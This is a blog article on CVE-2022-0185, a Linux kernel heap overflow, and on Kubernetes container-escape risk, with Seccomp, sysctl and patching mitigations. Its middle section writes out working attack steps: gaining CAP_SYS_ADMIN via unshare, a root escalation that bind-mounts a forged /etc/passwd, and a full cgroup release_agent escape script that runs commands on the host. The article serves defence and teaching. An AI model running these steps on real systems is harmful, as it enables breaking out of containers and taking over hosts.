Author: Mi Yang Yang, KubeSphere evangelist and die-hard cloud native enthusiast

On January 18, 2022, Linux maintainers and vendors discovered a heap buffer overflow vulnerability in the legacy_parse_param function of the Linux kernel's Filesystem Context functionality (kernel 5.1-rc1 and later). The vulnerability is tracked as CVE-2022-0185 and is rated high risk, with a severity score of 7.8.

This vulnerability allows out-of-bounds writes to kernel memory. Using it, an unprivileged attacker can bypass any Linux namespace restrictions and escalate privileges to root. For example, an attacker who has compromised one of your containers can escape from the container and escalate privileges.

The vulnerability was introduced in version 5.1-rc1 of the Linux kernel in March 2019. A patch released on January 18 fixes the problem, and all Linux users are advised to download and install the latest version of the kernel.

Vulnerability details

The vulnerability is caused by an integer underflow in the legacy_parse_param function of the Filesystem Context functionality (fs/fs_context.c). The Filesystem Context is used to create superblocks when a file system is mounted or remounted. A superblock records the characteristics of a file system, such as block and file sizes, as well as any storage blocks.

Sending more than 4095 bytes of input to the legacy_parse_param function bypasses the input length check, which results in an out-of-bounds write and triggers the vulnerability. An attacker can exploit this to write malicious data to other parts of memory, either crashing the system or executing arbitrary code to escalate privileges.

The input data for the legacy_parse_param function is supplied through the fsconfig system call, which configures the creation context of a file system (such as the superblock of an ext4 file system).
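The way the length check fails can be modelled in a few lines. The sketch below is an illustration, not the kernel source: it assumes, following public write-ups of the bug, that the check compares the length of the new parameter against `PAGE_SIZE - 2 - size` evaluated in unsigned arithmetic. The function names are hypothetical.

```python
PAGE_SIZE = 4096
U64_MASK = (1 << 64) - 1  # model a 64-bit unsigned size_t


def remaining_space(size: int) -> int:
    """Model `PAGE_SIZE - 2 - size` evaluated as an unsigned 64-bit value."""
    return (PAGE_SIZE - 2 - size) & U64_MASK


def check_allows_write(size: int, length: int) -> bool:
    """Return True if the modelled bounds check lets `length` more bytes in.

    `size` is the number of bytes already stored in the buffer.
    """
    return length <= remaining_space(size)


if __name__ == "__main__":
    for size in (4000, 4094, 4095):
        print(size, remaining_space(size), check_allows_write(size, 100))
```

With 4000 bytes stored, only 94 bytes remain and a 100-byte parameter is rejected. Once 4095 bytes are stored, the subtraction wraps around to a huge positive value, so every length passes the check and the write runs past the end of the buffer.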

// Add a null-terminated string pointed to by val using the fsconfig system call
fsconfig(fd, FSCONFIG_SET_STRING, "\x00", val, 0);

To use the fsconfig system call, an unprivileged user must hold at least the CAP_SYS_ADMIN capability in his or her current namespace. This means that access to any namespace in which the user holds this capability is enough to exploit the vulnerability.

If an unprivileged user does not have CAP_SYS_ADMIN, an attacker can obtain it with the unshare(CLONE_NEWNS | CLONE_NEWUSER) system call. The unshare system call lets a user create or clone a namespace in which the user has the capabilities needed for further attacks. This technique matters a great deal for Kubernetes and the wider container world, which rely on Linux namespaces to isolate Pods. An attacker can use it in a container escape attack which, once successful, gives the attacker full control over the host operating system and all containers running on it. From there the attacker can go on to attack other machines on the internal network segment, or even deploy malicious containers in a Kubernetes cluster.

The team behind the discovery published the exploit code and a proof of concept for the vulnerability on GitHub on January 25.
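As a rough illustration of that call, the sketch below invokes unshare(2) through ctypes. The function name `try_unshare` is hypothetical; the flag values are the ones defined in `<linux/sched.h>`.

```python
import ctypes
import os

# Flag values from <linux/sched.h>
CLONE_NEWNS = 0x00020000    # new mount namespace
CLONE_NEWUSER = 0x10000000  # new user namespace


def try_unshare(flags: int = CLONE_NEWNS | CLONE_NEWUSER) -> bool:
    """Call unshare(2) with `flags`; return True on success, False on failure.

    On failure the reason (for example EPERM when a Seccomp filter or a
    sysctl blocks the call) is printed instead of raised.
    """
    libc = ctypes.CDLL(None, use_errno=True)
    if libc.unshare(ctypes.c_int(flags)) == 0:
        return True
    err = ctypes.get_errno()
    print(f"unshare failed: {os.strerror(err)}")
    return False
```

The call changes the namespaces of the calling process, so `try_unshare()` should only be run in a throwaway process. Where the call succeeds, the process holds a full capability set inside the new user namespace, which is what makes the fsconfig path reachable.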

PoC

Docker and other container runtimes apply a default Seccomp profile that prevents processes in a container from making dangerous system calls, in order to protect Linux namespace boundaries.

Seccomp (short for Secure Computing Mode) was introduced into the Linux kernel in version 2.6.12 (March 8, 2005). In its original form it limited the system calls available to a process to four: read, write, _exit, and sigreturn. This original mode is an allowlist: a process in this mode may only use those four system calls on file descriptors that are already open, and the kernel kills it with SIGKILL or SIGSYS if it attempts any other system call.

However, by default Kubernetes does not use any Seccomp or AppArmor/SELinux profile to restrict the system calls of a Pod, which is dangerous. Processes in a Pod can freely make dangerous system calls and wait for an opportunity to acquire the privileges they need (such as CAP_SYS_ADMIN) for further attacks.
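Whether a process is actually running under a Seccomp filter can be read from the `Seccomp:` field of `/proc/<pid>/status`, where 0 means disabled, 1 strict mode and 2 filter mode. The helper below is a minimal sketch of that lookup; the function name is hypothetical.

```python
def seccomp_mode(status_text: str) -> str:
    """Return the Seccomp mode recorded in the text of /proc/<pid>/status."""
    names = {"0": "disabled", "1": "strict", "2": "filter"}
    for line in status_text.splitlines():
        if line.startswith("Seccomp:"):
            value = line.split(":", 1)[1].strip()
            return names.get(value, f"unknown ({value})")
    return "not reported"
```

Passing it the contents of `/proc/self/status` from inside a container shows whether a filter is applied: "filter" when a profile such as Docker's default is active, "disabled" when the process is unconfined.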

In a standard Docker environment, the unshare command is not available. Docker’s Seccomp filter blocks the system call used by this command.

$ docker run --rm -it alpine /bin/sh
/ # unshare
unshare: unshare(0x0): Operation not permitted

Now try the same thing in a Kubernetes Pod:

$ kubectl run --rm -it test --image=ubuntu /bin/bash
If you don't see a command prompt, try pressing enter.
root@test:/# lsns | grep user
4026531837 user        3     1 root /bin/bash
root@test:/#
root@test:/# apt update && apt install -y libcap2 libcap-ng-utils
root@test:/# ......
root@test:/# pscap -a
ppid  pid   name        command           capabilities
0     1     root        bash              chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap

We can see that the root user in the Pod does not have the CAP_SYS_ADMIN capability, but we can obtain it with the unshare command.

root@test:/# unshare -Urm
#
# pscap -a
ppid  pid   name        command           capabilities
0     1     root        bash              chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap
1     265   root        sh                full
# lsns | grep user
4026532695 user        3   265 root -sh
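The same check can be made without pscap by decoding the `CapEff` bitmask in `/proc/<pid>/status`, where CAP_SYS_ADMIN is bit 21. The helpers below are a minimal sketch with hypothetical names. The sample masks are illustrative: `00000000a80425fb` encodes exactly the fourteen capabilities listed for PID 1 above, while `000001ffffffffff` stands in for a "full" set (the exact value depends on the kernel).

```python
CAP_SYS_ADMIN = 21  # bit number from <linux/capability.h>


def has_capability(cap_mask_hex: str, cap_bit: int = CAP_SYS_ADMIN) -> bool:
    """Return True if bit `cap_bit` is set in a hex mask such as CapEff."""
    return bool((int(cap_mask_hex, 16) >> cap_bit) & 1)


def effective_caps(status_text: str) -> str:
    """Extract the CapEff hex string from the text of /proc/<pid>/status."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return line.split(":", 1)[1].strip()
    raise ValueError("no CapEff line found")


if __name__ == "__main__":
    print(has_capability("00000000a80425fb"))  # default Pod capability set
    print(has_capability("000001ffffffffff"))  # illustrative "full" set
```

Feeding `effective_caps()` the contents of `/proc/self/status` before and after `unshare -Urm` gives the same before-and-after picture as the two pscap listings.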

So what can you do with CAP_SYS_ADMIN? Here are two examples of how CAP_SYS_ADMIN can be used to infiltrate a system.

Escalating an ordinary user to root

The following steps promote an ordinary user on the host directly to root.

Start by giving python3 the CAP_SYS_ADMIN capability (note that this cannot be done on a symbolic link, only on the original file).

$ which python3
/usr/bin/python3
$ ll /usr/bin/python3
lrwxrwxrwx 1 root root 9 Mar 13  2020 /usr/bin/python3 -> python3.8*
$ setcap CAP_SYS_ADMIN+ep /usr/bin/python3.8
$ getcap /usr/bin/python3.8
/usr/bin/python3.8 = cap_sys_admin+ep

Create a normal user.

$ useradd test -d /home/test -m

Then switch to the ordinary user and enter that user's home directory.

$ su test
$ cd ~

Copy /etc/passwd to the current directory and change the password of user root to “password”.

$ cp /etc/passwd ./
$ openssl passwd -1 -salt abc password
$1$abc$BXBqpb9BZcZhXLgbee.0s/
$ head -2 passwd
root:$1$abc$BXBqpb9BZcZhXLgbee.0s/:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

Bind-mount the modified passwd file over /etc/passwd.

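$ cat mount-passwd.py
import ctypes
import os

# Load libc with errno tracking so that a failed mount() can be reported
libc = ctypes.CDLL("libc.so.6", use_errno=True)
libc.mount.argtypes = (ctypes.c_char_p, ctypes.c_char_p, ctypes.c_char_p,
                       ctypes.c_ulong, ctypes.c_char_p)
MS_BIND = 4096  # bind-mount flag from <sys/mount.h>
source = b"/home/test/passwd"
target = b"/etc/passwd"
filesystemtype = b"none"
options = b"rw"
mountflags = MS_BIND
# Bind-mount the modified copy over the real /etc/passwd
if libc.mount(source, target, filesystemtype, mountflags, options) != 0:
    err = ctypes.get_errno()
    raise OSError(err, os.strerror(err))

$ python3 mount-passwd.py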

Now for the moment of truth: switch to user root and enter the password "password".

$ su root
Password: 
root@coredns:/home/test#

Amazing: we have switched to root.

Let's check that we really have root privileges:

$ find / -name "*flag*" 2>/dev/null
/sys/kernel/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/block/vdb/hctx0/flags
/sys/kernel/debug/block/vda/hctx0/flags
/sys/kernel/debug/block/loop7/hctx0/flags
/sys/kernel/debug/block/loop6/hctx0/flags
/sys/kernel/debug/block/loop5/hctx0/flags
/sys/kernel/debug/block/loop4/hctx0/flags
/sys/kernel/debug/block/loop3/hctx0/flags
/sys/kernel/debug/block/loop2/hctx0/flags
/sys/kernel/debug/block/loop1/hctx0/flags
/sys/kernel/debug/block/loop0/hctx0/flags
....

$ cat /sys/kernel/debug/block/vdb/hctx0/flags
alloc_policy=FIFO SHOULD_MERGE

Yes, we really are root.

Finally, unmount /etc/passwd.

$ umount /etc/passwd

So, system administrators, think twice before granting the CAP_SYS_ADMIN capability to ordinary users.

Viewing all host processes from inside a container

Now for a container example: the following steps let you retrieve, from inside a container, the list of all processes running on the host.

We don't need to run a privileged container with the --privileged flag; that would be boring.

$ docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

Then run the following commands in the container. They cause the ps aux command to be executed on the host and its output to be saved to the /output file in the container.

# Mounts the RDMA cgroup controller and create a child cgroup
# This technique should work with the majority of cgroup controllers
# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist"
# It's because your setup doesn't have the RDMA cgroup controller, try change rdma to memory to fix it
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
# Finds path of OverlayFS mount for container
# Unless the configuration explicitly exposes the mount point of the host filesystem
# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# Sets release_agent to /path/payload
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Creates a payload
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup
# By creating a /bin/sh process and writing its PID to the cgroup.procs file in "x" child cgroup directory
# The script on the host will execute after /bin/sh exits 
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output

Eventually you can see all the processes running on the host in the container:

root@0c84f7587629:/# cat /output
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.3 172704 13148 ?        Ss    2021 131:32 /sbin/init nopti
root           2  0.0  0.0      0     0 ?        S     2021   0:18 [kthreadd]
root           3  0.0  0.0      0     0 ?        I<    2021   0:00 [rcu_gp]
root           4  0.0  0.0      0     0 ?        I<    2021   0:00 [rcu_par_gp]
root           6  0.0  0.0      0     0 ?        I<    2021   0:00 [kworker/0:0H-kblockd]
root           8  0.0  0.0      0     0 ?        I<    2021   0:00 [mm_percpu_wq]
root           9  0.0  0.0      0     0 ?        S     2021  18:36 [ksoftirqd/0]
root          10  0.0  0.0      0     0 ?        I     2021 262:22 [rcu_sched]
root          11  0.0  0.0      0     0 ?        S     2021   3:06 [migration/0]
root          12  0.0  0.0      0     0 ?        S     2021   0:00 [idle_inject/0]
root          14  0.0  0.0      0     0 ?        S     2021   0:00 [cpuhp/0]
root          15  0.0  0.0      0     0 ?        S     2021   0:00 [cpuhp/1]
......

I won't explain the exact meaning of these commands; if you are interested, read the comments in the script.

What is certain is that the CAP_SYS_ADMIN capability opens up many more possibilities for attackers, both on the host and inside containers. In container environments in particular, if the kernel cannot be upgraded for reasons beyond our control, we need to find other solutions.
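The least obvious step in the script is the sed expression that derives host_path: it pulls the `upperdir=` option out of the container's overlay mount entry in /etc/mtab, which is the directory on the host that backs the container's root file system. A rough Python equivalent, with a hypothetical function name and made-up sample paths, might look like this:

```python
import re
from typing import Optional


def overlay_upperdir(mtab_text: str) -> Optional[str]:
    """Return the upperdir= option of the first overlay mount, if any."""
    match = re.search(r"upperdir=([^,\s]*)", mtab_text)
    return match.group(1) if match else None


if __name__ == "__main__":
    # Hypothetical mtab line; real paths differ from host to host
    sample = (
        "overlay / overlay rw,relatime,"
        "lowerdir=/var/lib/docker/overlay2/l/AAA,"
        "upperdir=/var/lib/docker/overlay2/abc123/diff,"
        "workdir=/var/lib/docker/overlay2/abc123/work 0 0"
    )
    print(overlay_upperdir(sample))
```

Because files written to / inside the container land in that directory on the host, the script can hand the host a path to /cmd and later read /output back from inside the container.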

Solutions

Container level

Starting with v1.22, Kubernetes can use SecurityContext to apply a default Seccomp or AppArmor profile to resource objects and so protect Pods, Deployments, StatefulSets, DaemonSets, and so on. Although this feature is still in Alpha, users can already add their own Seccomp or AppArmor profile and reference it in SecurityContext. For example:

# pod-test.yaml
apiVersion: v1
kind: Pod
metadata:
  name: protected
spec:
  containers:
    - name: protected
      image: ubuntu
      command:
      - sleep
      - infinity
      securityContext:
        seccompProfile:
          type: RuntimeDefault

After creating the Pod, try using unshare to get the CAP_SYS_ADMIN capability.

$ kubectl exec -it protected -- bash
root@protected:/#
root@protected:/# unshare -Urm
unshare: unshare failed: Operation not permitted

The output shows that the unshare system call was successfully blocked, preventing the attacker from taking advantage of this capability.
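To find workloads that still lack this protection, a manifest can be checked for the `seccompProfile` field used above. The function below is a minimal sketch that works on a Pod manifest already parsed into a dict. Its name is hypothetical, and it ignores init containers and any cluster-wide default.

```python
from typing import Any, Dict, List


def containers_without_seccomp(pod: Dict[str, Any]) -> List[str]:
    """List containers with no seccompProfile at container or Pod level."""
    spec = pod.get("spec", {})
    pod_level = (spec.get("securityContext") or {}).get("seccompProfile")
    unprotected = []
    for container in spec.get("containers", []):
        own = (container.get("securityContext") or {}).get("seccompProfile")
        profile = own or pod_level  # a container-level setting takes precedence
        if not profile or profile.get("type") == "Unconfined":
            unprotected.append(container["name"])
    return unprotected
```

For the pod-test.yaml manifest above it returns an empty list; remove the securityContext block and it returns `["protected"]`.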

Host level

Another option is to disable user namespaces at the host level, which does not require a system restart. On Ubuntu, for example, the following two commands take effect immediately, and the setting persists across reboots.

$ echo "kernel.unprivileged_userns_clone=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf

On Red Hat systems, run the following commands to achieve the same effect.

$ echo "user.max_user_namespaces=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf
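To confirm that either setting is in force, the corresponding files under /proc/sys can be read back. The sketch below assumes the usual mapping of sysctl names to /proc/sys paths; the function names are hypothetical.

```python
from pathlib import Path
from typing import Dict, Optional

# sysctl names from the commands above, mapped to their /proc/sys paths
USERNS_SYSCTLS = {
    "kernel.unprivileged_userns_clone": "kernel/unprivileged_userns_clone",
    "user.max_user_namespaces": "user/max_user_namespaces",
}


def read_userns_sysctls(proc_sys: str = "/proc/sys") -> Dict[str, Optional[int]]:
    """Read each setting; None means the kernel does not expose it."""
    values: Dict[str, Optional[int]] = {}
    for name, relative in USERNS_SYSCTLS.items():
        path = Path(proc_sys) / relative
        values[name] = int(path.read_text().strip()) if path.is_file() else None
    return values


def userns_disabled(values: Dict[str, Optional[int]]) -> bool:
    """True if any exposed setting is 0, which blocks unprivileged user namespaces."""
    return any(value == 0 for value in values.values())
```

Calling `userns_disabled(read_userns_sysctls())` on a host returns True once one of the two settings has been applied. A value of None simply means that this distribution's kernel does not provide that particular knob.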

Recommendations for dealing with this vulnerability:

  • If your environment can tolerate patching the kernel and rebooting the system, patching or upgrading the kernel is the best option.
  • Reduce the use of privileged containers that have access to CAP_SYS_ADMIN.
  • For unprivileged containers, make sure a Seccomp filter blocks their calls to unshare to reduce the risk. Docker does this by default; Kubernetes needs extra configuration.
  • In the future, a Seccomp profile can be enabled for all workloads in a Kubernetes cluster. This feature is currently still in Alpha and must be enabled through a feature gate.
  • Disable the use of user namespaces by unprivileged users at the host level.

Final words

Container environments are complex, especially distributed scheduling platforms like Kubernetes. Every component has its own life cycle and attack surface, so security risks are easily exposed, and container cluster administrators must pay attention to every security detail. In most cases the security of a container depends on the security of the Linux kernel, so we need to keep an eye on any kernel security issue and apply a fix as soon as possible.


This article is published by OpenWrite!